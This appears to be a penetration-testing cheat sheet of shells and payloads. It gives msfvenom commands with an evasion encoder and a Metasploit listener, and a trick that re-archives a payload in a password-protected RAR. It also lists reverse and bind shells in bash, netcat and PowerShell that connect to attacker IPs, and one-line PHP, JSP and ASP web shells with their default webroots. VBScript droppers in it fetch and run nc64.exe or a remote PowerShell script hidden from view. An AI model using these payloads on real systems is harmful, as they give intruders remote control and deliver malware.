๐ŸšShells & Payloads

Refer for additional payloads

Staged payload:

Executes in multiple stages and is more complex and requires meterpreter listener

windows/shell/reverse_tcp

Stageless payload:

The payload app contains all shellcode required to execute hence larger in size. Shell can be caught in netcat. Try this first.

windows_shell_reverse_tcp

Payloads

To use encoding:

x86/shikata_ga_nai is a popular encoder
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
# -i for iterations

Listener

Netcat can not handle staged payloads

To use a meterpreter listener use:

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"

Archiving

Archiving the payload:

wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a ~/test.rar -p ~/test.js

Removing the .RAR Extension

mv test.rar test

Archiving the Payload Again

rar a test2.rar -p test

Shells

  • Basic bash reverse shell:

bash -c 'bash -i >& /dev/tcp/10.10.14.37/9001 0>&1'
  • Reverse shell on linux

nc IP 4444 -e /bin/sh
  • Reverse shell on windows with psexec

psexec.py user:'password'@IP
  • windows netcat

nc.exe โ€“e cmd.exe IP 4444

Web Shells

Code: php

<?php system($_REQUEST["cmd"]); ?>

Code: jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

Code: asp

<% eval request("cmd") %>

Default locations:

Web ServerDefault Webroot

Apache

/var/www/html/

Nginx

/usr/local/nginx/html/

IIS

c:\inetpub\wwwroot\

XAMPP

C:\xampp\htdocs\

Example:

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

Then to access:

curl http://SERVER_IP:PORT/shell.php?cmd=id

VBScript Shell

Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.1.208/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.1.208 4445 -e cmd.exe"

or

CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.1.208/shell.ps1')"

Powershell:

Reverse shells:

powershell -c "iwr -uri 10.10.14.22/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.14.22 9001
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Bind shell:

// Some codepowershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

Last updated